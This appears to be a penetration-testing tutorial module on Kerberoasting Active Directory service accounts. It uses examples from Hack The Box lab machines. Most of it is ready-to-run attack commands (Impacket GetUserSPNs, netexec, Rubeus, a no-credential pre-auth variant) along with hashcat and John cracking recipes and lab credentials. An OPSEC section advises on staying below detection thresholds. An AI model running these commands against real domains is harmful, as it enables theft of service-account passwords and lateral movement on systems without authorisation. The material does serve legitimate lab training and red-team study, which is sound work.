Back to All Modules

Kerberoasting

#Overview

Kerberoasting allows any authenticated domain user to request Ticket Granting Service (TGS) tickets for service accounts. The TGS-REP is encrypted with the service account's NTLM password hash. By extracting the encrypted portion and cracking it offline, the service account's plaintext password can be recovered. This is one of the most reliable lateral movement techniques in Active Directory, as service accounts frequently have weak or default passwords, and service account passwords rarely change.

#Prerequisites

  • A valid domain user account (any privilege level)
  • Network access to the KDC on port 88
  • A domain-joined or time-synchronized client

#Detection & Enumeration

#Manual SPN Discovery

# LDAP query for all accounts with SPNs
ldapsearch -x -H 'ldap://10.10.10.100' -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' \
  -b "dc=active,dc=htb" -s sub \
  "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" \
  serviceprincipalname | grep -B 1 servicePrincipalName

# Impacket GetUserSPNs (list SPNs without requesting TGS)
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100
# Output: SPN, account name, and group membership for each service account

# netexec kerberoastable enumeration
netexec ldap 10.10.10.100 -u svc_tgs -p 'pass' --kerberoasting kerb.txt
BASH

#BloodHound Edge

In BloodHound, the Kerberoastable edge exists on any user with at least one SPN. After ingesting data, filter by "Find Kerberoastable Users" or use Cypher:

MATCH (u:User {hasspn: true}) RETURN u.name, u.serviceprincipalnames
CYPHER

#Exploitation / Execution

#Standard Kerberoasting

# Request TGS tickets for all SPN accounts and output hashes
# -request: request and extract the TGS-REP hash
# -dc-ip: domain controller IP
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
# Output: $krb5tgs$23$*<user>$<DOMAIN>$<spn>*$<hash>

# Save hash to file
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request -outputfile hashes.txt
BASH

#Targeted Kerberoasting (Request Weaker Encryption)

Some accounts support only RC4 encryption when the SPN is requested with a specific user. This yields $krb5tgs$23$ (RC4) instead of $krb5tgs$18$ (AES256), which cracks much faster.

# Request TGS for a specific service account
GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request-user Administrator

# Using netexec for targeted kerberoasting
netexec ldap dc01.rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k --kerberoasting output.txt
BASH

#Kerberoasting from Windows

# Rubeus kerberoast — all SPN accounts
Rubeus.exe kerberoast /nowrap

# Rubeus kerberoast — specific user
Rubeus.exe kerberoast /user:Administrator /nowrap

# Rubeus — request only RC4 tickets (faster cracking)
Rubeus.exe kerberoast /tgtdeleg /nowrap
POWERSHELL

#Pre-Authentication Kerberoasting (No Credentials)

If an AS-REP-roastable user exists, their TGT can be used to perform Kerberoasting without any valid credentials. This technique combines the AS-REP and Kerberoasting attack paths.

# Requires the ThePorgs fork of Impacket with -no-preauth support
# First, get the AS-REP roastable user's username (e.g., jjones)
# Then use GetUserSPNs with -no-preauth
GetUserSPNs.py -no-preauth jjones -request -usersfile usernames.txt rebound.htb/ -dc-ip 10.10.11.231
# The fork must support -no-preauth (PR #1413 merged into some forks)

# Output will include both $krb5tgs$18$ and $krb5tgs$23$ tickets
# $krb5tgs$18$: AES256 encrypted — slower to crack
# $krb5tgs$23$: RC4 encrypted — faster to crack
BASH

#Hash Cracking

#Hash Formats

Hash PrefixHashcat ModeEncryption Type
$krb5tgs$23$13100RC4-HMAC (TGS-REP etype 23)
$krb5tgs$18$19700AES256-CTS (TGS-REP etype 18)
$krb5tgs$17$19600AES128-CTS (TGS-REP etype 17)
# Hashcat mode 13100 — RC4 TGS-REP (most common)
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --force --potfile-disable

# Hashcat mode 19700 — AES256 TGS-REP
hashcat -m 19700 hash /usr/share/wordlists/rockyou.txt --force

# John the Ripper — auto-detects format
john hash --wordlist=/usr/share/wordlists/rockyou.txt

# John with specific format
john hash --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt
BASH

#Cracking Strategies

# Strategy 1: RockYou first (fast)
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt --force

# Strategy 2: RockYou + best64 rule (good coverage)
hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Strategy 3: SecLists + rules
hashcat -m 13100 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --force

# Strategy 4: Targeted wordlist based on company keywords
# Build custom wordlist with CeWL or manual curation
BASH

#RC4 vs AES Ticket Differences

  • RC4 ($23$): Uses MD4 hash of password directly. Faster cracking at ~20M+ guesses/second.
  • AES ($18$): Uses PBKDF2 with 4096 iterations. Much slower cracking at ~200K guesses/second.
  • Some environments enforce AES-only for service tickets. If all hashes are $18$, consider requesting tickets with the -request-user flag or using Rubeus which may yield $23$ tickets depending on the KDC configuration.

#Common Pitfalls

  • No SPN accounts found: The domain may not have service accounts with SPNs. Check for computer accounts (they have implicit SPNs).
  • All tickets are AES ($18$): RC4 may be disabled domain-wide. Cracking AES tickets is feasible but requires more targeted wordlists.
  • Hashcat mode not found: Older hashcat versions may not support mode 19600/19700. Update hashcat or use john.
  • KDC_ERR_S_PRINCIPAL_UNKNOWN: The SPN is not registered. Verify the target exists.

#OPSEC Considerations

  • Each TGS request generates Event ID 4769 (Kerberos service ticket requested) on the DC
  • These events are distinct from normal service ticket requests (different ticket options flags)
  • The encryption type requested (RC4 vs AES) is logged — an unusual spike in RC4 requests is detectable
  • Microsoft Defender for Identity (MDI) and ATA flag Kerberoasting traffic patterns
  • Bulk Kerberoasting is noisy — prefer targeted requests for specific high-value service accounts
  • BloodHound can identify Kerberoastable users without making any TGS requests (LDAP-only enumeration)

#Post-Exploitation Value

  • Service accounts frequently have elevated privileges — Domain Admin in the worst case (as in Active HTB where Administrator had an SPN)
  • Service account passwords rarely change, providing long-term access
  • A cracked service account can be used for further Kerberoasting via TGT delegation
  • The service account NTLM hash can be used for Silver Ticket attacks

#Cross-References

#Tool References

ToolLink
Impacket (GetUserSPNs)https://github.com/fortra/impacket
ThePorgs Impacket Forkhttps://github.com/ThePorgs/impacket
Rubeushttps://github.com/GhostPack/Rubeus
hashcathttps://hashcat.net/hashcat/
targetedKerberoast.pyhttps://github.com/ShutdownRepo/targetedKerberoast

#Source Machines

  • Active (Easy) — Administrator had an SPN (active/CIFS:445); cracked to Ticketmaster1968
  • Rebound (Insane) — ldap_monitor SPN cracked to 1GR8t@$$4u; used pre-auth Kerberoasting via jjones' TGT